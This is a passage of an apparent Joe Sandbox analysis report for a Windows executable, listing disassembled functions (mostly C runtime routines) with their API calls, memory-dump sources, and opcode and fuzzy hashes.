                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10116522A1D64151EA60BF51988017EEA74EF5DB80FCC4039EA4C57697CF3CE540AF60
                                                                                                                                                                                                                        Function 00007FF729365664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                        • Instruction ID: 5bb6896085856dc864b2a7a860ab44ef23d47541755c75a2aad12cb8413a430a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4921307361868286DB61AF18D880369BAB0EB94B94F99423CD75D476D6DF3CD400DF14
                                                                                                                                                                                                                        Function 00007FF72934F6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                        • Instruction ID: d023442f11e0261deecdf79c6fbe4e9c0f01fe329ce69825ea8aa3c12483c3b6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3001A521A0874240E904BF569D40079FAB5EB59FE0F8D5639DE6C53BD7DE3CD4129B10
                                                                                                                                                                                                                        Function 00007FF72935720C Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                        • Instruction ID: fb4c4b31adddd692102cd939d13327f35811ff1a2d59a459e36e38cf31458c77
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5016120A0A68251FE74BE626DC1179DAB0EF4D7A4FCC053CF95E426C7DE2CE441AA21
                                                                                                                                                                                                                        Function 00007FF729357548 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                        • Instruction ID: 5b9dcfd0fdcd0860c89f30c20c4e8e128e6710912e81286137c3bf3f82c376c8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13E0ECD0E0834762FA247EA84DC62B99970DF6C350FC84438D90A46293DD1C7854BE31
                                                                                                                                                                                                                        Function 00007FF72935DEA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF72935A63A,?,?,?,00007FF7293543FD,?,?,?,?,00007FF72935979A), ref: 00007FF72935DEFD
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                        • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                        • Instruction ID: cf238cc805623ad78bb77a7eaa0bcda07f0102bd75dbbf4a9ea240a6b9bd6b19
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1F04F10B09247A1FE54BE619C912B5D6B0EF5CB40FCD843CC91E86293DD1CA4416A30
                                                                                                                                                                                                                        Function 00007FF72935C90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF72934FFB0,?,?,?,00007FF72935161A,?,?,?,?,?,00007FF729352E09), ref: 00007FF72935C94A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                        • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                        • Instruction ID: 8a18de58817fb1a9cb9de02dddb0d6198e2e7a7e44314f80c7990b1b324a9d40
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6F05E01B1824765FE547E619CD527596B1DF4DB64FCD063CD82E862C7DE1CA440AD30

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 00007FF72934C44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                        • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                        • Instruction ID: f11ab3da4b51350083db21927e56afd06ee040dfcefda86695e9f58571c51e89
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E311F72609A8186EB609F60EC807EE73B4FB44744F49503DDA4D47B95DF38D548DB24
                                                                                                                                                                                                                        Function 00007FF7293429E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                        • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                        • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                        • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                        • Instruction ID: 8df79f3303d56381ddffabace3338227c670cc6577f1aa8a3b0916d812e54591
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9321537260CA8182E720AF51F8802DAB3B4FB88784F84013EEACD53A59DF3CD5469F54
                                                                                                                                                                                                                        Function 00007FF729364F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF729364F55
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293648A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7293648BC
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C58: RtlFreeHeap.NTDLL(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C6E
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C58: GetLastError.KERNEL32(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C78
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF729359BEF,?,?,?,?,?,00007FF729359ADA), ref: 00007FF729359C19
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF729359BEF,?,?,?,?,?,00007FF729359ADA), ref: 00007FF729359C3E
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF729364F44
                                                                                                                                                                                                                          • Part of subcall function 00007FF729364908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72936491C
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7293651BA
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7293651CB
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7293651DC
                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72936541C), ref: 00007FF729365203
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4070488512-0
                                                                                                                                                                                                                        • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                        • Instruction ID: ad6424e5e8604dfd07304fbb049125b5f740bb4bd20f2208b6d05555d88748e1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8D19E27E0824286EB24BF25DCC01B9A7B1EB45794FCA413DDA4D47687DE3CE841EB64
                                                                                                                                                                                                                        Function 00007FF729359924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                        • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                        • Instruction ID: 6005d7b0a946d76194e745112cc04eaad82aa4c2d2b0e20795a858baa57a786c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC313C36608B8186DB609F25EC802EEA7B4FB89754F99013DEA9D42B5ADF38C155CB10
                                                                                                                                                                                                                        Function 00007FF729360B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                        • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                        • Instruction ID: 18ae6479d3028aba3bc7801368ed659f44eb887446651337f484869bac7309c2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CB1D526B1869241EA60AF26DC811B9E3B0EB44BE4FC9413DE99D07BC6DF3CE441DB14
                                                                                                                                                                                                                        Function 00007FF72936518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7293651BA
                                                                                                                                                                                                                          • Part of subcall function 00007FF729364908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72936491C
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7293651CB
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293648A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7293648BC
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7293651DC
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293648D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7293648EC
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C58: RtlFreeHeap.NTDLL(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C6E
                                                                                                                                                                                                                          • Part of subcall function 00007FF729359C58: GetLastError.KERNEL32(?,?,?,00007FF729362032,?,?,?,00007FF72936206F,?,?,00000000,00007FF729362535,?,?,?,00007FF729362467), ref: 00007FF729359C78
                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72936541C), ref: 00007FF729365203
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3458911817-0
                                                                                                                                                                                                                        • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                        • Instruction ID: 773bbca52b942a31192905a8de5c2f4e700c00e0194581e34e9b9f3e2366a3ba
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32512926A1864286E720EF21ECC11A9E771FB48784F8A513DEA4D47697DF3CE440EB64
                                                                                                                                                                                                                        Function 00007FF7293450B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF729345C57,?,00007FF72934308E), ref: 00007FF7293450C0
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF729345C57,?,00007FF72934308E), ref: 00007FF729345101
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF729345C57,?,00007FF72934308E), ref: 00007FF729345126
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF729345C57,?,00007FF72934308E), ref: 00007FF72934514B
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF729345C57,?,00007FF72934308E), ref: 00007FF729345173
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF729345C57,?,00007FF72934308E), ref: 00007FF72934519B
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF729345C57,?,00007FF72934308E), ref: 00007FF7293451C3
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF729345C57,?,00007FF72934308E), ref: 00007FF7293451EB
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF729345C57,?,00007FF72934308E), ref: 00007FF729345213
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
